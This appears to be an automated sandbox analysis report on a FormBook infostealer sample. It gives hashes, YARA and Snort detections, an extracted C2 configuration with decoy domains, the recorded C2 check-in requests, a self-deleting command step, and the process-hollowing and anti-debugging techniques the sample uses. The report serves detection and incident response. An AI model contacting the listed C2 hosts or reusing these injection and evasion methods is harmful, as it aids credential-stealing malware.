Analysis Report NdBLyH2h5d.exe

Overview

General Information

Sample Name: NdBLyH2h5d.exe
Analysis ID: 385309
MD5: 3fef6985af0d52ab6701df170096b504
SHA1: ac8db3220c960262f8e666eae676066cec541b3a
SHA256: a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NdBLyH2h5d.exe (PID: 5612 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
    • NdBLyH2h5d.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 4228 cmdline: /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (string matches and offsets identical to those listed for the first dump above)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (string matches and offsets identical to those listed under Memory Dumps above)
0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | (string matches and offsets identical to those listed under Memory Dumps above)
1.2.NdBLyH2h5d.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.NdBLyH2h5d.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (string matches and offsets identical to those listed under Memory Dumps above)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (extracted configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: NdBLyH2h5d.exe | Virustotal: Detection: 20%
Source: NdBLyH2h5d.exe | ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 6.2.rundll32.exe.4d44f8.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.rundll32.exe.4b17960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: NdBLyH2h5d.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP | source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: NdBLyH2h5d.exe, rundll32.exe
Source: Binary string: rundll32.pdb | source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL | source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.montcoimmigrationlawyer.com/uoe8/
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.fibermover.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.mojilifenoosa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.7chd.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.hispekdiamond.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.swashbug.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.zagorafinancial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.funnyfootballmugs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.przyczepy.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.3992199.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.montcoimmigrationlawyer.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.missjeschickt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1 | Host: www.fibermover.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 45.142.156.44
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: Joe Sandbox View | ASN Name: CNSERVERSUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown | DNS traffic detected: queries for: www.fibermover.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 12 Apr 2021 08:06:24 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmp | String found in binary or memory: https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same 14 memory dumps and unpacked PEs listed for this signature under AV Detection above

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49560 NtWriteFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A710 NtOpenProcessToken,
